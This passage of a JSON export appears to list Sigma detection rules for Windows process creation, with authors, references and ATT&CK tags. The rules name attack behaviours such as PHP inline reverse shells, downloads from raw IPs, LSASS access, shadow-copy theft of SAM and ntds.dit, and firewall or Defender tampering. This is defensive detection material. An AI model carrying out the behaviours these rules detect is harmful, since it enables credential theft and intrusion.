"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", "value": "Abusing Print Executable" }, { "description": "Detects the use of SharpUp, a tool for local privilege escalation", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-08-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_sharpup.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/GhostPack/SharpUp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpup.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1615", "attack.t1569.002", "attack.t1574.005" ] }, "related": [ { "dest-uuid": "1b20efbf-8063-4fc3-a07d-b575318a301b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "70d81154-b187-45f9-8ec5-295d01255979", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", "value": "HackTool - SharpUp PrivEsc Tool Execution" }, { "description": "Detects execution of php using the \"-r\" flag. 
This could be used as a way to launch a reverse shell or execute live php code.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_php_inline_command_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.php.net/manual/en/features.commandline.php", "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d81871ef-5738-47ab-9797-7a9c90cd4bfb", "value": "Php Inline Command Execution" }, { "description": "Detects potentially suspicious file downloads directly from IP addresses using Wget.exe", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wget_download_direct_ip.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.gnu.org/software/wget/manual/wget.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wget_download_direct_ip.yml" ], "tags": [ "attack.execution" ] }, "uuid": "17f0c0a8-8bd5-4ee0-8c5f-a342c0199f35", "value": "Suspicious File Download From IP Via Wget.EXE" }, { "description": "Detects when a possibly suspicious driver is being installed via the pnputil.exe lolbin", "meta": { "author": "Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger", "creation_date": "2021-09-30", "falsepositive": [ "Pnputil.exe being used may be 
performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html", "https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" ], "tags": [ "attack.persistence", "attack.t1547" ] }, "related": [ { "dest-uuid": "1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", "value": "Suspicious Driver Install by pnputil.exe" }, { "description": "Detects suspicious IIS native-code module installations via command line", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-12-11", "falsepositive": [ "Unknown, as the way administrators install IIS modules varies from organisation to organisation" ], "filename": "proc_creation_win_iis_appcmd_susp_module_install.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml" ], 
"tags": [ "attack.persistence", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", "value": "IIS Native-Code Module Command Line Installation" }, { "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", "meta": { "author": "frack113", "creation_date": "2022-10-02", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_ultravnc.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1219/T1219.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultravnc.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "145322e4-0fd3-486b-81ca-9addc75736d8", "value": "Use of UltraVNC Remote Access Software" }, { "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-12-04", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_whoami_all_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_all_execution.yml" ], "tags": [ "attack.discovery", "attack.t1033", "car.2016-03-001" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c248c896-e412-4279-8c15-1c558067b6fa", "value": "Enumerate All Information With Whoami.EXE" }, { "description": "Detects execution of \"ftp.exe\" script with the \"-s\" or \"/s\" flag and any child processes ran by \"ftp.exe\".", "meta": { "author": "Victor Sergeev, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_ftp_arbitrary_command_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Ftp/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ftp_arbitrary_command_execution.yml" ], "tags": [ "attack.execution", "attack.t1059", "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", "value": "Potential Arbitrary Command Execution Via FTP.EXE" }, { "description": "Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit)\n", "meta": { "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "creation_date": "2021-08-09", "falsepositive": [ "Unlikely" ], "filename": 
"proc_creation_win_susp_sensitive_file_access_shadowcopy.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", "https://twitter.com/vxunderground/status/1423336151860002816?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sensitive_file_access_shadowcopy.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", "value": "Sensitive File Access Via Volume Shadow Copy Backup" }, { "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spawned by an \"svchost.exe\" process", "meta": { "author": "Markus Neis", "creation_date": "2018-06-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_mshta_lethalhta_technique.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://codewhitesec.blogspot.com/2018/07/lethalhta.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.005" ] }, "related": [ { "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", "value": "Potential LethalHTA Technique Execution" }, { "description": "Detects the execution of an Office application that points to a document that is located in a trusted location. 
Attackers often use this to bypass macro security settings and execute their malicious code.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_office_exec_from_trusted_locations.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Max_Mal_/status/1633863678909874176", "https://techcommunity.microsoft.com/t5/microsoft-365-blog/new-security-hardening-policies-for-trusted-documents/ba-p/3023465", "Internal Research", "https://twitter.com/_JohnHammond/status/1588155401752788994", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f99abdf0-6283-4e71-bd2b-b5c048a94743", "value": "Potentially Suspicious Office Document Executed From Trusted Location" }, { "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", "meta": { "author": "frack113", "creation_date": "2022-02-11", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_remote_access_tools_anydesk.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b52e84a3-029e-4529-b09b-71d19dd27e94", "value": "Remote Access Tool - AnyDesk Execution" }, { "description": "Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. 
This could be a sign of a rogue \".appx\" package installation/execution", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-12", "falsepositive": [ "Legitimate packages that make use of external binaries such as Windows Terminal" ], "filename": "proc_creation_win_susp_appx_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_appx_execution.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", "value": "Potentially Suspicious Windows App Activity" }, { "description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-19", "falsepositive": [ "Legitimate usage of the script. 
Always investigate what's being registered to confirm if it's benign" ], "filename": "proc_creation_win_lolbin_register_app.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/sblmsrsn/status/1456613494783160325?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_register_app.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1c8774a0-44d4-4db0-91f8-e792359c70bd", "value": "REGISTER_APP.VBS Proxy Execution" }, { "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-12-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_where_browser_data_recon.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_where_browser_data_recon.yml" ], "tags": [ "attack.discovery", "attack.t1217" ] }, "related": [ { "dest-uuid": "5e4a2073-9643-44cb-a0b5-e7f4048446c7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "725a9768-0f5e-4cb3-aec2-bc5719c6831a", "value": "Suspicious Where Execution" }, { "description": "Detects potential tampering with Windows 
Defender settings, such as adding exclusions, via wmic", "meta": { "author": "frack113", "creation_date": "2022-12-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_namespace_defender.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/", "https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/", "https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_namespace_defender.yml" ], "tags": [ "attack.credential-access", "attack.t1546.008" ] }, "related": [ { "dest-uuid": "70e52b04-2a0c-4cea-9d18-7149f1df9dc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "51cbac1e-eee3-4a90-b1b7-358efb81fa0a", "value": "Potential Windows Defender Tampering Via Wmic.EXE" }, { "description": "Detects netsh commands that turn off the Windows firewall", "meta": { "author": "Fatih Sirin", "creation_date": "2019-11-01", "falsepositive": [ "Legitimate administration activity" ], "filename": "proc_creation_win_netsh_fw_disable.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall", "https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/", "https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_disable.yml" ], "tags": [ 
"attack.defense-evasion", "attack.t1562.004", "attack.s0108" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "57c4bf16-227f-4394-8ec7-1b745ee061c3", "value": "Firewall Disabled via Netsh.EXE" }, { "description": "Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics.", "meta": { "author": "pH-T (Nextron Systems)", "creation_date": "2023-04-17", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_pua_crassus.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/vu-ls/Crassus", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_crassus.yml" ], "tags": [ "attack.discovery", "attack.t1590.001" ] }, "related": [ { "dest-uuid": "e3b168bd-fcd7-439e-9382-2e6c2f63514d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2c32b543-1058-4808-91c6-5b31b8bed6c5", "value": "PUA - Crassus Execution" }, { "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. 
This could be a sign of data stealing or remote control", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/defaultnamehere/cookie_crimes/", "https://mango.pdf.zone/stealing-chrome-cookies-without-a-password", "https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/", "https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml" ], "tags": [ "attack.credential-access", "attack.t1185" ] }, "related": [ { "dest-uuid": "544b0346-29ad-41e1-a808-501bb4193f47", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", "value": "Potential Data Stealing Via Chromium Headless Debugging" }, { "description": "Detects ScreenConnect program starts that establish a remote access to a system.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-02-11", "falsepositive": [ "Legitimate use by administrative staff" ], "filename": "proc_creation_win_remote_access_tools_screenconnect_installation_cli_param.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_installation_cli_param.yml" ], "tags": [ "attack.initial-access", "attack.t1133" ] }, "related": [ { "dest-uuid": 
"10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", "value": "Remote Access Tool - ScreenConnect Installation Execution" }, { "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-04-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_getprocess_lsass.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20220205033028/https://twitter.com/PythonResponder/status/1385064506049630211", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_getprocess_lsass.yml" ], "tags": [ "attack.credential-access", "attack.t1552.004" ] }, "related": [ { "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", "value": "PowerShell Get-Process LSASS" }, { "description": "Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.", "meta": { "author": "Eli Salem, Sander Wiebing, oscd.community", "creation_date": "2020-10-08", "falsepositive": [ "Legitimate modification of keys" ], "filename": "proc_creation_win_regini_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Regini/", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regini", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_execution.yml" ], "tags": [ "attack.t1112", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5f60740a-f57b-4e76-82a1-15b6ff2cb134", "value": "Registry Modification Via Regini.EXE" }, { "description": "Detects suspicious child processes of \"provlaunch.exe\" which might indicate potential abuse to proxy execution.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-08", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_provlaunch_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1674399582162153472", "https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_provlaunch_susp_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f9999590-1f94-4a34-a91e-951e47bedefd", "value": "Suspicious Provlaunch.EXE Child Process" }, { "description": "Detects suspicious powershell invocations from interpreters or unusual programs", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-01-16", "falsepositive": [ "Microsoft Operations Manager (MOM)", "Other scripts" ], "filename": "proc_creation_win_powershell_script_engine_parent.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://www.securitynewspaper.com/2017/03/20/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_script_engine_parent.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "95eadcb2-92e4-4ed1-9031-92547773a6db", "value": "Suspicious PowerShell Invocation From Script Engines" }, { "description": "Detects file downloads directly from IP address URL using curl.exe", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-10-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_curl_download_direct_ip_exec.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv", "https://labs.withsecure.com/publications/fin7-target-veeam-servers", "https://github.com/pr0xylife/IcedID/blob/8dd1e218460db4f750d955b4c65b2f918a1db906/icedID_09.28.2023.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml" ], "tags": [ "attack.execution" ] }, "uuid": "9cc85849-3b02-4cb5-b371-3a1ff54f2218", "value": "File Download From IP URL Via Curl.EXE" }, { "description": "Detects the execution of malicious OneNote documents that contain embedded scripts.\nWhen a user clicks on a OneNote attachment and then on the malicious link inside the \".one\" file, it exports and executes the malicious embedded script from specific directories.\n", "meta": { "author": "@kostastsale", "creation_date": "2023-02-02", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_office_onenote_embedded_script_execution.yml", "level": 
"high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://bazaar.abuse.ch/browse/tag/one/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_onenote_embedded_script_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.001" ] }, "related": [ { "dest-uuid": "a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "84b1706c-932a-44c4-ae28-892b28a25b94", "value": "OneNote.EXE Execution of Malicious Embedded Scripts" }, { "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_mpiexec.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps", "https://twitter.com/mrd0x/status/1465058133303246867", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mpiexec.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "729ce0ea-5d8f-4769-9762-e35de441586d", "value": "MpiExec Lolbin" }, { "description": "Detects usage of winget to install applications via manifest file. 
Adversaries can abuse winget to download payloads remotely and execute them.\nThe manifest option enables you to install an application by passing in a YAML file directly to the client.\nWinget can be used to download and install exe, msi or msix files later.\n", "meta": { "author": "Sreeman, Florian Roth (Nextron Systems), frack113", "creation_date": "2020-04-21", "falsepositive": [ "Some false positives are expected in some environment that may use this functionality to install and test their custom applications" ], "filename": "proc_creation_win_winget_local_install_via_manifest.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget", "https://learn.microsoft.com/en-us/windows/package-manager/winget/install#local-install", "https://lolbas-project.github.io/lolbas/Binaries/Winget/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_local_install_via_manifest.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "313d6012-51a0-4d93-8dfc-de8553239e25", "value": "Install New Package Via Winget Local Manifest" }, { "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. 
adselfservice plus exploitation)", "meta": { "author": "Andreas Hunkeler (@Karneades)", "creation_date": "2021-12-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_java_keytool_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html", "https://redcanary.com/blog/intelligence-insights-december-2021", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_keytool_susp_child_process.yml" ], "tags": [ "attack.initial-access", "attack.persistence", "attack.privilege-escalation" ] }, "uuid": "90fb5e62-ca1f-4e22-b42e-cc521874c938", "value": "Suspicious Shells Spawn by Java Utility Keytool" }, { "description": "Detects usage of \"appcmd\" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-22", "falsepositive": [ "Legitimate usage of appcmd to add new URL rewrite rules" ], "filename": "proc_creation_win_iis_appcmd_susp_rewrite_rule.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/answers/questions/739120/how-to-add-re-write-global-rule-with-action-type-r", "https://twitter.com/malmoeb/status/1616702107242971144", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": 